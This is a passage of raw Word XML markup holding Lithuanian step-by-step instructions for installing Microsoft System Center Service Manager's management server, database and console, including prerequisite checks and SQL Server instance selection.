      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„Service Manager“ paskyra</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE26243" w14:textId="27FA172C" w:rsidR="00435A43" w:rsidRPr="005A5C28" w:rsidRDefault="152383A3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo eigos paskyra</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43B208" w14:textId="7BC2C571" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="003D0EE7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6B27CA" w14:textId="088B9D8D" w:rsidR="00435A43" w:rsidRPr="005A5C28" w:rsidRDefault="4E88C83E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Norėdami įdiegti „Service Manager“ valdymo serverį, duomenų bazę ir konsolę</w:t>
      </w:r>
      <w:r w:rsidR="006C2F80" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36F761" w14:textId="1BCA0FBE" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prisijunkite prie fizinio kompiuterio naudodami abonementą, kuriame yra administravimo duomenys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FE8C6" w14:textId="1EF8508C" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">„Service Manager“ diegimo laikmenoje dukart spustelėkite failą </w:t>
      </w:r>
      <w:r w:rsidR="00C016D7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Setup.exe</w:t>
      </w:r>
      <w:r w:rsidR="00C016D7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C3AC6" w14:textId="73D4A3C5" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„Microsoft System Center“ puslapyje spustelėkite „Service Manager“</w:t>
      </w:r>
      <w:r w:rsidR="56577B9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7A53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>aldymo serveris</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C140F" w14:textId="4C943A39" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Produkto registracijos puslap</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> laukeliuose įveskite informaciją. Laukel</w:t>
      </w:r>
      <w:r w:rsidR="012D8209" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Produkto raktas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įveskite produkto raktą, kurį gavote naudodami „Service Manager“, arba pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Diegti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kaip vertinimo versiją (180 dienų bandomoji versija). Perskaitykite „Microsoft“ programinės įrangos licencijos sąlygas ir, jei</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sutinkate</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Aš perskaičiau, supratau ir sutinku su licencijos sutarties sąlygomis</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="006331C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="006C2F80" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidR="006331C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="48D0DDCA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305FFF25" w14:textId="7153AA2C" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Puslapyje</w:t>
      </w:r>
      <w:r w:rsidR="00296B15" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Diegimo vieta” patikrinkite, ar yra pakankamai laisvos vietos diske</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="007C3ECE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Kitas“</w:t>
      </w:r>
      <w:r w:rsidR="2414FC9F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jei reikia, spustelėkite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C3ECE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Naršyti“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, kad pakeistumėte vietą, kurioje bus įdiegtas „Service Manager“ </w:t>
      </w:r>
      <w:r w:rsidR="2B98C1E3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>aldymo serveris</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F191511" w14:textId="5E9A8E40" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistemos patikrinimo rezultatų puslapyje įsitikinkite, kad būtina sąlyga patikrinta arba bent jau </w:t>
      </w:r>
      <w:r w:rsidR="561459B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>susipažinta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> su </w:t>
      </w:r>
      <w:r w:rsidR="72672232" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>taisyklėmis</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="00296B15" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A321AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Kitas“</w:t>
      </w:r>
      <w:r w:rsidR="3449C183" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3F7F5" w14:textId="37105D71" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jei išankstinių sąlygų tikrintuvas nustato, kad „Microsoft Report Viewer Redistributable“ nebuvo įdiegta, spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00CF02B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Įdiegti</w:t>
      </w:r>
      <w:r w:rsidR="009719E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F301146" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Microsoft Report Viewer Redistributable</w:t>
      </w:r>
      <w:r w:rsidR="58989928" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kai „Microsoft Report Viewer Redistributable 2008“ (KB971119) sąrankos vedlys </w:t>
      </w:r>
      <w:r w:rsidR="60EEB489" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pabaigs vykdymą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, dar kartą spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00BA5625" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Tikrinti</w:t>
      </w:r>
      <w:r w:rsidR="00BA5625" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> išankstines sąlygas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7CFCE" w14:textId="5ACFC636" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="591D127F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFA2AC4" w14:textId="3E6C2EA6" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Puslapyje</w:t>
      </w:r>
      <w:r w:rsidR="0BA8B4C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Konfigūruoti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="24B42776" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„Service Manager“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tikrina esamą kompiuterį, ar nėra SQL serverio egzemplioriaus. Pagal numatytuosius nustatymus, jei randamas egzempliorius, „Service Manager“</w:t>
      </w:r>
      <w:r w:rsidR="29A22B68" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, tai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sukuria naują duomenų bazę esamame egzemplioriuje. Jei rodomas egzempliorius, spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="003E7DFE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00760D27" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidR="003E7DFE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B760703" w14:textId="5DA5F89C" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Puslapyje „Service Manager“</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="54FA451D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">aldymo grupės konfigūravimas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atlikite šiuos veiksmus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20179C40" w14:textId="1BCA0FBE" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lauke </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Valdymo grupės pavadinimas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įveskite unikalų valdymo grupės pavadinimą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D7192" w14:textId="0ACD3CAA" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="003E7DFE" w:rsidRPr="005A5C28">
        <w:rPr>
